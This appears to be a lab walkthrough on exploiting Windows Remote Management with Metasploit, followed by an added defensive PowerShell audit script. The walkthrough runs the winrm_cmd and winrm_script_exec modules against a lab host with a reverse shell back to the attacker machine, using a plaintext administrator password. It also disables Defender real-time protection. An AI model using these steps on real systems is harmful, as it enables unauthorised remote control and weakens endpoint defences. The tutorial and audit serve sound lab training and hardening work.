In a Windows-based environment, IT professionals often need to remotely manage and execute commands on other Windows devices. For this they rely on a common protocol such as Web Services Management (WS-Management), which allows management information to be exchanged across different operating systems and services on a network. Microsoft's own implementation of WS-Management is Windows Remote Management (WinRM), built specifically for Microsoft Windows operating systems.

Exploitation:

Open Kali for scanning and exploitation. Open up msfconsole for the exploitation part:

    sudo msfconsole
    use auxiliary/scanner/winrm/winrm_cmd
    msf auxiliary(scanner/winrm/winrm_cmd) > set RHOSTS 192.168.83.140
    RHOSTS => 192.168.83.140
    msf auxiliary(scanner/winrm/winrm_cmd) > set USERNAME Administrator
    USERNAME => Administrator
    msf auxiliary(scanner/winrm/winrm_cmd) > set PASSWORD P@ssword1
    PASSWORD => P@ssword1

By default the command the module executes is ipconfig /all.

Remember the local user setup for WinRM access, where we gave access to the user sysadmin; let's try that: It actually worked.

Now let's try for a remote shell:

    msf6 > use exploit/windows/winrm/winrm_script_exec
    msf6 exploit(windows/winrm/winrm_script_exec) > set RHOSTS 192.168.83.140
    msf6 exploit(windows/winrm/winrm_script_exec) > set LHOST 192.168.83.128

Also turn off real-time protection on your Windows server, because it will quarantine the execution. Use this command in PowerShell on your DC:

    Set-MpPreference -DisableRealtimeMonitoring $true

3. After selecting the exploit/windows/winrm/winrm_script_exec module, a reverse shell payload was automatically coupled with the exploit module within Metasploit.

4. For the exploit/windows/winrm/winrm_script_exec module to have a better chance of success, force the exploit module to use the VBS CmdStager option if your target is an old system; if not, set it to false. Let's see the options:
...
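For the defensive side of the same setup, here is an added PowerShell audit (not part of the original post) that reports the WinRM exposure and the Defender state this walkthrough relies on. It assumes an elevated session on the Windows server with the built-in Defender and LocalAccounts modules available, and it only reads settings.

```powershell
# Added example, not from the original post: read-only audit of the settings
# this walkthrough touches, run in an elevated PowerShell session on the server.
# Every check uses built-in cmdlets and changes nothing.

$findings = @()

# 1. Is the WinRM service running at all?
$svc = Get-Service -Name WinRM -ErrorAction SilentlyContinue
if ($svc -and $svc.Status -eq 'Running') {
    $findings += "WinRM service is running"
}

# 2. Which listeners are exposed (transport, port, bound address)?
Get-WSManInstance -ResourceURI winrm/config/listener -Enumerate |
    ForEach-Object {
        $findings += "Listener: $($_.Transport) on port $($_.Port) (address $($_.Address))"
        if ($_.Transport -eq 'HTTP') {
            $findings += "  HTTP listener: credentials and commands are not protected by TLS"
        }
    }

# 3. Does the service accept unencrypted traffic? (expected: false)
$unenc = (Get-Item WSMan:\localhost\Service\AllowUnencrypted).Value
if ($unenc -eq 'true') { $findings += "AllowUnencrypted is enabled" }

# 4. Who can open remote sessions besides local Administrators?
#    (the walkthrough granted WinRM access to a local user named sysadmin)
$members = Get-LocalGroupMember -Group 'Remote Management Users' -ErrorAction SilentlyContinue
foreach ($m in $members) { $findings += "Remote Management Users member: $($m.Name)" }

# 5. Is Defender real-time monitoring switched off, as the walkthrough does?
$mp = Get-MpPreference -ErrorAction SilentlyContinue
if ($mp -and $mp.DisableRealtimeMonitoring) {
    $findings += "Defender real-time monitoring is DISABLED; restore it with Set-MpPreference -DisableRealtimeMonitoring `$false"
}

$findings
```

Running this after the lab exercise shows at a glance which of the changes made above (the extra WinRM user, the disabled real-time protection) are still in place and need to be reverted.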